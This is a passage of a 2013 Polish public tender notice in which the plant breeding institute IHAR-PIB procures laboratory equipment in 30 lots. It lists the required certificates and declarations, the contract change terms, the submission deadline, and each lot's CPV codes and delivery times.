 - dokument potwierdzający spełnienie normy PN-EN 12469
 - certyfikat niezależnej akredytowanej jednostki certyfikującej, 

Dla Pakietu 13;
 - Certyfikaty: CE 0434 MDD; CE 0575 PED

Dla Pakietu 14;
      1. Dokument potwierdzający zgodność z dyrektywami:
- 2006/42/WE
- 2006/95/WE
- 2004/108/WE
      2. Dokument potwierdzający zgodność z normami:
             - PN-ISO 3310-1
             - PN-ISO 565

Dla Pakietu 23;
 - Certyfikaty Jakości i bezpieczeństwa, wystawione przez producenta zamontowanych  urządzeń
Dla Pakietu 25;
-Certyfikaty Jakości i bezpieczeństwa, wystawione przez producenta zamontowanych  urządzeń.
Dla Pakietu 27;
-	Dokumenty potwierdzające spełnienie norm ; Medical Dewices Directive (93/42/EEC) Electro Magnetic Compatibility Directive (89/336/EEC) / EN 13060:2004 / Pressure vessel to ASME Section VIII / BS EN 610100 Parts 1&2 / HTM20/10 / HTM20/31  ISO 13485:1996 / ISO 9001:2000
Dla Pakietu 31;
 - Certyfikaty Jakości i bezpieczeństwa, wystawione przez producenta zamontowanych  urządzeń</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wykonawca zobowiązany jest do wypełnienia i złożenia:

a). podpisanej  Oferty- (zał. nr 1/1; 1/2 do SIWZ)
 b). podpisanego Oświadczenia Wykonawcy (art. 22 ust. 1 i art. 24 ust. 1 i 2 ustawy P.z.p.) -  (załącznik nr 3   do SIWZ,
 c). podpisanego Oświadczenia osoby fizycznej (art 24 ust. 1 pkt. 2 ustawy Pzp) -  (załącznik  nr 3a do SIWZ), 

2.Wykonawca wraz z ofertą, składa Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy Pzp, albo informację o tym, że nie należy do grupy kapitałowej - (załącznik nr 3b). 

3.Oświadczenia należy sporządzić ściśle wg wzoru druków załączonych  przez Zamawiającego.
4.W przypadku składania ofert przez podmioty występujące wspólnie:
 a). każdy z Wykonawców zobowiązany jest do złożenia Oświadczeń, stanowiących załączniki nr 3, 3a i 3b do SIWZ. 
b). łącznie składają dokumenty o których mowa w ust 6 pkt 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy stanowi (załącznik nr 5; i 5a dla Pakietu 23, 25 i 31).
1.Każda zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu pod rygorem nieważności.
 2. Zgodnie z art. 144 ust. 1 ustawy - Prawo zamówień publicznych strony dopuszczają zmiany umowy:
1)	w zakresie:
a)	numeru katalogowego produktu, 
b)	zmiany terminu wykonania dostawy, której konieczność zaistniała wskutek okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy, o czas wynikający z tych okoliczności,
c)	zmiany obowiązujących przepisów prawa związanych z przedmiotowym zamówieniem,
d)	zmianie wartości przedmiotowej umowy, wynikającej z okoliczności określonych w niniejszym pkt lit. b)-c), o zakres tych zmian.
2)	w sytuacji gdy:
a)	wprowadzony zostanie do sprzedaży przez Wykonawcę produkt zmodyfikowany (udoskonalony),
b)	wystąpi przejściowy brak przedmiotu umowy z przyczyn leżących po stronie producenta przy jednoczesnym dostarczeniu produktu zamiennego (fabrycznie nowego) o parametrach nie gorszych od produktu objętego umową, z zastrzeżeniem, że Wykonawca niezwłocznie dostarczy prawidłowy przedmiot umowy, przy czym okres gwarancji zostanie liczony od momentu otrzymania prawidłowego produktu. 
Powyższe zmiany nie mogą skutkować zmianą ceny, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.

3. Nie stanowi zmiany w rozumieniu art. 144 ustawy Prawo Zamówień Publicznych:
 a). zmiana danych związanych z obsługą administracyjno-organizacyjną umowy np.  zmiana rachunku bankowego,
           
 b). zmiana danych teleadresowych, zmiany osób wykazanych do kontaktów między   stronami.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ihar.edu.pl/dostawy_i_uslugi.php<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Hodowli i Aklimatyzacji Roślin - Państwowy Instytut Badawczy
Radzików, 05-870 Błonie
Budynek Laboratorium II, p. 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2013 godzina 14:00, miejsce: IHAR - PIB  Radzików, Kancelaria Ogólna, pokój nr 39.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1; Suszarka laboratoryjna z wymuszonym obiegiem - dla Oddziału IHAR-PIB w Poznaniu,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 1- Załącznik nr 2/1 do SIWZ

1.	Zamówienie nalezy zrealizować w terminie:
Dla Pakietu1-..... .do 6 tygodni od daty zawarcia umowy,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2; Kamera z programem do mikroskopu Jeneval kontrast firmy Carl Zeiss jena - dla oddiału IHAR-PIB w Poznaniu,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 2- Załącznik nr 2/2 do SIWZ
Zamówienie nalezy zrealizować w terminie:

Dla Pakietu 2-.......4-6 tygodni od daty zawarcia umowy,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.65.16.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3; Wirówka z chłodzeniem- dla IHAR-PIB Radzików, Samodzielna Pracownia Oceny Jakości Produktów Roślinnych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:

Dla Pakietu 3- Załącznik nr 2/3 do SIWZ
1.	Zamówienie nalezy zrealizować w terminie:

Dla Pakietu 3-.........4 tygodnie od daty zawarcia umowy,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4; Wytrząsarka - dla IHAR-PIB Radzików, Samodzielna Pracownia Oceny Jakości Produktów Roślinnych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:

Dla Pakietu 4- Załącznik nr 2/4 do SIWZ
1.	Zamówienie nalezy zrealizować w terminie:

Dla Pakietu 4-...........6 tygodni od daty zawarcia umowy,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5; Młocarenka jednokłosowa- laboratoryjna - dla Zakładu IHAR-PIB w Krakowie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:

Dla Pakietu 5- Załącznik nr 2/5 do SIWZ
1.	Zamówienie nalezy zrealizować w terminie:

Dla Pakietu 5 - ...... 4 tygodnie od daty zawarcia umowy,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6; Osuszacz powietrza - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:

Dla Pakietu 6- Załącznik nr 2/6 do SIWZ
1.	Zamówienie nalezy zrealizować w terminie:

Dla Pakietu 6 - .......4 tygodnie od daty zawarcia umowy,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7; Komora laminarna - dla Oddziału IHAR-PIB w Młochowie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 7- Załącznik nr 2/7 do SIWZ
Zamówienie naleyż zrealizować w terminie: 5 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8; Suszarka laboratoryjna - dla IHAR-PIB Radzików, ZTRMiE- Pracownia Traw Pastewnych i Roślin Motylkowatych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 8- załącznik nr 2/8
Zamówienie należy zrealizować w terminie do 6 tygodni od daty zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9; Komora laminarna - dla IHAR-PIB Radzików, ZF- Pracownia Organizmów Kwarantannowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:

Dla Pakietu 9- Załącznik nr 2/9 
Zamówienie należy zrealizować w terminie- 4 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10; Zamrażarka niskotemperaturowa (-80°C) - dla Oddziału IHAR-PIB w Bydgoszczy,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 10-Załącznik nr 2/10 
zamówienie należy zrealizować w terminie 4-6 tygodni od daty zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11; Podajnik próbek do cytometru CyFlowR Robby 8 Autoloading Station, producent: Partec GmbH, - - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 11- załącznik nr 2/11
Zamówienie należy zrealizować w terminie do 10 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 51.43.00.00-0, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12; Przystawka rozcierająca materiał roślinny (bulwy) do młynka Retsch - dla Oddziału IHAR-PIB w Młochowie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 12- Załącznik nr 2/12
Zamówienie należy zrealizować w terminie 4-6 tygodni od daty zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13; Autoklaw pionowy o pojemności 50l, klasa S - dla Oddziału IHAR-PIB w Poznaniu,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 13-załacznik nr 2/13
zamówienie należy zrealizowaćw terminie- 6-7 tygodni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 49.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14; Wytrząsarka wraz z zestawem sit do frakcjonowania nasion - dla IHAR-PIB Radzików, ZTRMiE- Pracownia Traw Pozapaszowych i Roślin Energetycznych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 14- Załącznik nr 2/14
Zamówienie należy zrealizować w terminie do 6 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15; Chlorofilomierz - dla IHAR-PIB Radzików, ZTRMiE- Pracownia Traw Pozapaszowych i Roślin Energetycznych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 15- Załącznik nr 2/15
Zamówienie należy zrealizować w terminie do 4 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16; Spektrofotometr - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 16- załącznik nr 2/16
Zamówienie należy zrealizować w terminie do 6 tygodni od daty zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 51.43.00.00-0, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17; Termo-wytrząsarka z chłodzeniem - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 2/17- Załącznik nr 2/17
zamówienie należy zrealizować w terminie do 6 tygodni od daty zawarcia umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 51.43.00.00-0, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Pakiet 18; Aparat do destylacji wody - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 18-Załacznik nr 2/18
Zamówienie należy zrealizować w terminie do 6 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 51.43.00.00-0, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Pakiet 19; Myjka mikropłytek - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 190Załącznik nr 2/19
zamówienie należy zrealizować w terminie -do 6 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 51.43.00.00-0, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet 20; Suszarka laboratoryjna z wymuszonym obiegiem powietrza - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla pakietu 20-Załącznik nr 2/20
Zamówienie należy zrealizować w terminie do 6 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-0, 51.43.00.00-0, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet 21; Zestaw do mieszania i wirowania próbek - dla IHAR-PIB Radzików, Krajowe Centrum Roślinnych Zasobów Genowych,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 2/21- Załącznik nr 2/21
Zamówienie należy zrealizować w terminie- do 6 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 51.43.00.00-0, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet 22; Stacja meteorologiczna - dla Oddziału IHAR-PIB w Jadwisinie,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 22- Załącznik nr 2/22
zamówienie należy zrealizować w terminie 4 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.12.00.00-2, 51.43.00.00-0, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet 23; Agregat chłodniczy z oprzyrządowaniem - dla Oddziału IHAR-PIB w Poznaniu,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 2/23- załącznik nr 2/23
zamówienie należy zrealizować w terminie 6 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.51.32.00-7, 45.33.12.30-4, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet 24; Zestaw do epifluorescencji do mikroskopu Delta Opticall-1000 - dla IHAR-PIB Radzików, ZF- Pracownia Chorób Roślin,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 2/24- załącznik nr 2/24
zamówienie należy zrealizować w terminie 4 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.51.00.00-3, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet 25; Klimatyzator - dla IHAR-PIB Radzików, ZF- Pracownia Chorób Roślin,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 25-załącznik nr 2/25
zamówienie należy zrealizować w terminie 4 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.72.00-3, 45.33.12.20-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet 26; Odpylacz mobilny - Ogród Botaniczny Krajowego Centrum Roślinnych Zasobów Genowych w Bydgoszczy,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 26- załącznik nr 2/26
Zamówienie należy zrealizować w terminie 4-6 tygodni.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet 27 - Autoklaw - dla Oddziału IHAR-PIB w Bydgoszczy,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 27-załącznik nr 2/27
Zamówienie należy zrealizować w terminie 4 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 52.43.00.00-9, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet 28 - Szafa termostatyczna - dla Oddziału IHAR-PIB w Bydgoszczy,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 28-załacznik nr 2/28
Zamówienie należy zrealizować w terminie 4 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 51.43.00.00-0, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Pakiet 29- Odciąg laboratoryjny - dla IHAR-PIB Radzików, ZNiN,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ
Dla Pakietu 29-załacznik nr 2/29
Zamówienie należy zrealizować w terminie 4-5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 80.51.10.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Pakiet 30 - Wytrząsarka laboratoryjna - dla IHAR-PIB Radzików, ZF-PCHR,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowią załączniki nr 2 do SIWZ:
Dla Pakietu 30- załącznik nr 2/30
Zamówienie należy zrealizowaćw terminie 6 tygodni od daty zawarcia umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 42.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
